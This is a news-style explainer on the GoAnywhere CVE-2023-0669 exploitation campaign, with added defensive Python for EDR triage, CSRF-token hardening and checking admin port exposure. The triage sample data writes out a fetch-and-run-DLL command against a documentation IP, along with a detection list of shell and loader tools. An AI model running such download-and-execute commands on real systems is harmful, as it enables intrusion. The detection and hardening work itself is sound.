Massive GoAnywhere RCE Exploit: Everything You Need to Know

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) added three new entries to its Known Exploited Vulnerabilities catalog. Among them was CVE-2023-0669, a bug that has paved the way for exploits and follow-on ransomware attacks against hundreds of organizations in recent weeks.

The bug was discovered in GoAnywhere, a Windows-based file-sharing software from Fortra, formerly HelpSystems. According to its website, GoAnywhere is used at more than 3,000 organizations to manage documents of all kinds. According to data from Enlyft, most of those are large organizations, with at least 1,000 and, often, more than 10,000 employees, mostly based in the United States.

The bug, tracked as CVE-2023-0669, allows hackers to remotely execute code on target systems, through the Internet, without any need for authentication. As of this writing, this vulnerability has not yet received an official CVSS rating from the National Vulnerability Database.

But we need not wonder about how dangerous it is, as hackers have already pounced. On Feb. 10, days after Fortra released a patch, the Clop ransomware gang claimed to have exploited CVE-2023-0669 in over 130 organizations. After three weeks and counting, it’s unclear whether or not more organizations are still at risk.

Timeline of the GoAnywhere Exploit(s)

On Feb. 2, two abnormal commands triggered alerts in an IT environment monitored by endpoint detection and response (EDR) vendor Huntress. Both were executed on a host designated for processing transactions on the GoAnywhere platform, though the significance of this wasn’t clear yet.

“At first glance, the alert itself was fairly generic,” wrote Joe Slowik, threat intelligence manager for Huntress. “But further analysis revealed a more interesting set of circumstances.”

An entity on this alerted network had attempted to download a file from a remote resource. Slowik and his colleagues tried to access the file themselves, but by then the port used to download it had been closed up. “We don’t really know for certain why,” Slowik tells Dark Reading. “It’s possible that the adversary was working at a very rapid clip.”

They did have the IP address of that entity, however, which traced back to Bulgaria and was flagged as malicious by VirusTotal. The actor seemed to be from outside of the organization, and had used their first command to download and run a dynamic link library (DLL) file.

“Knowing that the DLL was also executed further raised the risk level of the incident,” Slowik says, “since if it was malware that was downloaded, it is now running on the system.”

There were other signs, too, that this was a compromise. But even after isolating the relevant server, a second server at the targeted organization became infected. “We were worried that we had a very persistent adversary,” Slowik recalls.
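The pattern Huntress describes above (the MFT host's own service process spawning a command that fetches a remote resource and runs a DLL, then the same pattern appearing on a second server) is the kind of thing a simple EDR triage rule can surface. The following is an added example written for this article, not Huntress's detection logic and not code from Fortra. It assumes, as a hypothetical, that the GoAnywhere service runs as a Java process under a GoAnywhere install directory and that such a process has no legitimate reason to spawn shells or DLL loaders; the sample events, paths, IP address (from the TEST-NET-2 documentation range) and tool name are all constructed.

```python
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, Iterable, List, Optional, Tuple


@dataclass
class ProcessEvent:
    """One process-creation record as an EDR agent might report it."""
    host: str
    parent_image: str
    image: str
    command_line: str
    remote_ip: Optional[str] = None  # destination of any outbound connection tied to the event


# Assumed, not taken from the article: the MFT service is a Java process under a
# GoAnywhere directory, and it has no business spawning shells or DLL loaders.
MFT_PARENT = re.compile(r"goanywhere.*\\javaw?\.exe$", re.I)
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
                       "certutil.exe", "bitsadmin.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
DLL_RE = re.compile(r"\b[\w.-]+\.dll\b", re.I)


def score_event(ev: ProcessEvent, known_bad_ips: FrozenSet[str] = frozenset()) -> Tuple[int, List[str]]:
    """Return (score, reasons). Events not spawned by the MFT service score 0."""
    reasons: List[str] = []
    if not MFT_PARENT.search(ev.parent_image):
        return 0, reasons
    child = ev.image.rsplit("\\", 1)[-1].lower()
    if child in SUSPICIOUS_CHILDREN:
        reasons.append("mft-service-spawned-shell-or-loader")
    if URL_RE.search(ev.command_line):
        reasons.append("remote-download-in-command-line")
    if DLL_RE.search(ev.command_line):
        reasons.append("dll-referenced")
    if ev.remote_ip and ev.remote_ip in known_bad_ips:
        reasons.append("known-bad-remote-ip")
    return len(reasons), reasons


def triage(events: Iterable[ProcessEvent], known_bad_ips: FrozenSet[str] = frozenset()) -> Dict[str, Dict]:
    """Aggregate scores per host so a second host showing the same pattern stands out."""
    hosts: Dict[str, Dict] = {}
    for ev in events:
        score, reasons = score_event(ev, known_bad_ips)
        if score == 0:
            continue
        entry = hosts.setdefault(ev.host, {"score": 0, "reasons": set()})
        entry["score"] += score
        entry["reasons"].update(reasons)
    return hosts


def hosts_to_isolate(triaged: Dict[str, Dict], threshold: int = 3) -> List[str]:
    """Hosts at or above the threshold, highest score first."""
    return sorted((h for h, e in triaged.items() if e["score"] >= threshold),
                  key=lambda h: -triaged[h]["score"])


# Constructed sample telemetry: two MFT hosts showing the fetch-then-load pattern,
# a workstation doing something ordinary, and a benign MFT child job.
JAVA = r"C:\Program Files\GoAnywhere\jre\bin\java.exe"
FETCH = r"cmd.exe /c fetch-tool http://198.51.100.23:8080/item -o C:\Windows\Temp\item.dll"
SAMPLE_EVENTS = [
    ProcessEvent("mft-01", JAVA, r"C:\Windows\System32\cmd.exe", FETCH, "198.51.100.23"),
    ProcessEvent("mft-01", JAVA, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\Windows\Temp\item.dll,Start"),
    ProcessEvent("mft-02", JAVA, r"C:\Windows\System32\cmd.exe", FETCH, "198.51.100.23"),
    ProcessEvent("ws-07", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcessEvent("mft-01", JAVA, JAVA, "java.exe -jar scheduled-job.jar"),
]
KNOWN_BAD = frozenset({"198.51.100.23"})  # constructed threat-intel hit, standing in for the VirusTotal flag

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS, KNOWN_BAD)
    for host in hosts_to_isolate(result):
        print(host, result[host]["score"], sorted(result[host]["reasons"]))
```

Scoring by independent reasons rather than a single signature is deliberate: the remote file was gone by the time Huntress looked, so a rule that depended on the payload would have missed the event, whereas parentage, a URL in a command line, and a DLL reference are all visible from the process event alone.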

The researchers still lacked a copy of the downloaded malware, but all of the evidence surrounding it seemed to accord with activity previously associated with a malware family called Truebot. “The post in the URI structure that was used mapped to earlier Truebot samples,” Slowik says. “The DLL exports that were referenced in order to launch the malware, or similar to historical tripod samples, as well as some strings and code structures, all matched. Within the samples themselves, all of it aligned very nicely with what had previously been reported in 2022 for Truebot.”

Truebot has been linked to a prolific Russian group called TA505. Notably, TA505 has utilized the ransomware-as-a-service (RaaS) malware Clop in previous attacks.

On the same day as Slowik’s investigation, reporter Brian Krebs publicly republished an advisory Fortra had sent to its users the day before. GoAnywhere was being exploited, its developers explained, and they were implementing a temporary service outage in response.

Whatever mitigations were taken weren’t enough. On Feb. 10, hackers behind the Clop ransomware told Bleeping Computer that they’d used the GoAnywhere exploit to breach more than 130 organizations.

How CVE-2023-0669 Works

CVE-2023-0669 is a cross-site request forgery (CSRF) bug that arises from how unpatched GoAnywhere users install their software licenses.

Interestingly, it was as much a design choice as an oversight. “Typically, installing a license involves downloading a license file from a server and uploading it to your device,” explains Ron Bowes, lead security researcher for Rapid7, who released the most detailed publicized analysis of how an internal user could trigger the exploit. “Fortra chose to make that whole process transparent, where the license is delivered through the administrator’s browser. That means the user gets a much smoother experience.”

However, that seamlessness came at a cost. “There is no CSRF protection (and the cookie is not actually required, so no authentication is required to exploit this issue),” Bowes explained in his analysis. “That means that this can, by design, be exploited via cross-site request forgery.”

In its report, Rapid7 labeled the exploitability of this vulnerability as “very high.”

“While the administration port should not be exposed to the internet,” Bowes says, “it’s very easy to configure it that way by mistake. And once an attacker understands the vulnerability, it can be exploited without any risk of crashing the application or corrupting data.”

Rapid7 also labeled “very high” the value of such an exploit to an attacker. As Bowes explains, “due to the nature of the application (managed file transfer, or MFT), it’s common for a GoAnywhere MFT server to sit on a network perimeter and to have the file transfer ports publicly exposed. This makes it a good target for both pivoting into an organization’s internal network, and/or stealing potentially sensitive data directly off the target.”

On Feb. 6, Fortra fixed CVE-2023-0669 “by adding what they call a ‘license request token,’” Bowes explains, “which is included in the encrypted request to Fortra’s server. It behaves exactly as a CSRF token would, preventing an attacker from leveraging an administrator’s browser.”
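To make concrete why a request token closes the hole Bowes describes in the two sections above (an endpoint that neither checks a token nor actually requires the session cookie, fixed by a token that "behaves exactly as a CSRF token would"), here is an added example written for this article. It is not Fortra's code and not Rapid7's proof of concept; it models the license-install endpoint as a plain Python function taking a request dictionary, and the handler names, the `license_request_token` form field, the session ids and the license blobs are all hypothetical.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed server-side key; a real deployment would load it from protected config.
SERVER_SECRET = secrets.token_bytes(32)


def issue_request_token(session_id: str) -> str:
    """Mint a token bound to one admin session. Only the page served to that
    session ever sees it, so a page on another origin cannot read or guess it."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_request_token(session_id: Optional[str], token: Optional[str]) -> bool:
    """Accept only a token minted for this exact session (constant-time compare)."""
    if not session_id or not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac.encode(), expected.encode())


def vulnerable_install_license(request: Dict) -> str:
    """Models the unpatched behaviour the article describes: the endpoint acts on
    any POST carrying a license blob, checking neither a token nor the cookie."""
    if "license" not in request.get("form", {}):
        return "400 missing license"
    return "200 license installed"


def hardened_install_license(request: Dict) -> str:
    """Models the fix: a request token bound to the session cookie must accompany
    the request, and a cross-site form post has no way to supply it."""
    session_id = request.get("cookies", {}).get("session")
    token = request.get("form", {}).get("license_request_token")
    if not verify_request_token(session_id, token):
        return "403 invalid or missing license request token"
    if "license" not in request["form"]:
        return "400 missing license"
    return "200 license installed"


def simulate() -> Dict[str, Dict[str, str]]:
    """Run four constructed requests through both handlers and collect the outcomes."""
    admin = "sess-admin-1"
    token = issue_request_token(admin)
    requests = {
        # the admin submits the form that the admin page served, token included
        "legitimate": {"cookies": {"session": admin},
                       "form": {"license": "<license blob>", "license_request_token": token}},
        # direct POST with no cookie at all: the unauthenticated case Bowes notes
        "no_cookie": {"form": {"license": "<attacker blob>"}},
        # classic CSRF: the admin's browser attaches the cookie automatically,
        # but the cross-origin page that triggered the post never saw the token
        "cross_site": {"cookies": {"session": admin}, "form": {"license": "<attacker blob>"}},
        # a token minted for some other session, replayed against the admin's
        "wrong_session": {"cookies": {"session": admin},
                          "form": {"license": "<attacker blob>",
                                   "license_request_token": issue_request_token("sess-other")}},
    }
    return {name: {"vulnerable": vulnerable_install_license(r),
                   "hardened": hardened_install_license(r)}
            for name, r in requests.items()}


if __name__ == "__main__":
    for name, outcome in simulate().items():
        print(f"{name:14} vulnerable={outcome['vulnerable']!r:26} hardened={outcome['hardened']!r}")
```

The token is keyed to the session id rather than stored per user so that a token obtained in the attacker's own session is useless against the administrator's, which is the property that stops the "leveraging an administrator's browser" path; the vulnerable handler, by contrast, accepts all four requests.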

What to Do Now

As severe as the exploit is, only a fraction of GoAnywhere customers are vulnerable to outside hackers through CVE-2023-0669. However, even those without Internet-exposed GoAnywhere instances are still vulnerable to internal users, or to attackers who have gained initial access to a network, acting through regular Web browsers.

The bug can be exploited remotely if an organization’s GoAnywhere administration port (8000 or 8001) is exposed on the Internet. As of last week, more than 1,000 GoAnywhere instances were exposed, but, Bleeping Computer explained, only 135 of those pertained to the relevant ports 8000 and 8001. Most of those vulnerable seem to have already been swept up in one big campaign by the Clop group.
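Since the paragraph above turns on whether ports 8000 and 8001 are reachable from the Internet, an administrator's first check is simply to probe their own hosts from an outside vantage point. The script below is an added example for this article, not a Fortra or Bleeping Computer tool; it only reports TCP reachability of the two admin ports named in the article and includes a loopback self-test so it can be exercised offline. The hostname argument and the wording of the status lines are this example's own.

```python
import socket
import sys
from typing import Dict, Iterable, List, Tuple

# Admin ports named in the article. The file-transfer ports are a separate matter
# (commonly meant to be public) and are deliberately not part of this check.
ADMIN_PORTS = (8000, 8001)


def tcp_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """True if a TCP handshake to host:port completes within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_admin_exposure(host: str, ports: Iterable[int] = ADMIN_PORTS,
                         timeout: float = 2.0) -> Dict[int, bool]:
    """Map each admin port to whether it accepted a connection from this vantage point."""
    return {p: tcp_port_open(host, p, timeout) for p in ports}


def report(host: str, ports: Iterable[int] = ADMIN_PORTS) -> List[str]:
    """Human-readable lines; run from outside the perimeter to answer the exposure question."""
    lines = []
    for port, is_open in check_admin_exposure(host, ports).items():
        if is_open:
            status = "REACHABLE: restrict the admin port and confirm the Feb. 6 patch is applied"
        else:
            status = "closed or filtered from here"
        lines.append(f"{host}:{port} {status}")
    return lines


def run_self_test() -> Tuple[bool, bool]:
    """Exercise the probe offline: one loopback port with a listener, one without.
    Returns (result for the listening port, result for the closed port)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]
    # Grab a second ephemeral port, then release it so nothing is listening there.
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()
    try:
        return tcp_port_open("127.0.0.1", open_port), tcp_port_open("127.0.0.1", closed_port)
    finally:
        listener.close()


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for line in report(target):
        print(line)
```

A "closed or filtered" result from inside the network says nothing about Internet exposure, which is why the probe has to be run from outside; conversely, a reachable result is the condition under which the article says the bug is exploitable remotely, so it should be treated as a finding even if the patch has been applied.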

“We urgently advise all GoAnywhere MFT customers to apply this patch,” Fortra wrote in another advisory to its internal customers. “Particularly for customers running an admin portal exposed to the Internet, we consider this an urgent matter.”
